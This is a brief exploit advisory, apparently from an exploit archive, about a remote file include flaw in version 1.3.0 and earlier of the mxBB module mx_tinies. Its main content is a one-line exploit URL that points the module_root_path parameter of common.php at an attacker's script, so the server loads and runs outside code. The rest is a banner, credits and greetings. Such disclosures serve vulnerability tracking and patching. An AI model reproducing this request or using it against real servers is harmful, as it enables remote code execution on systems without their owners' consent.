id: 1230
date: 12/02/2006
title: mxBB Module mx_tinies <= 1.3.0 Remote File Include Vulnerability
author: bd0rk
cves: 

================================================================
mxBB Module mx_tinies <= 1.3.0 Remote File Include Vulnerability
================================================================


     +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     +                                                         +
     + mx_tinies 1.3.0 (common.php) File Include Vulnerability +
     +                                                         +
     + Bugfounder: bd0rk || SOH-Crew                           +
     +                                                         +
     +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


 
 Exploit: http://[y0urh0st]/[paTh]/includes/common.php?module_root_path=[Ev!lScript]

 Gr33tz: TheJT, Vakum, Kacper, rgod, str0ke, pritzel

 bd0rk ---> German Hacker [white hat] :-)



#  0day.today [2023-03-26]  #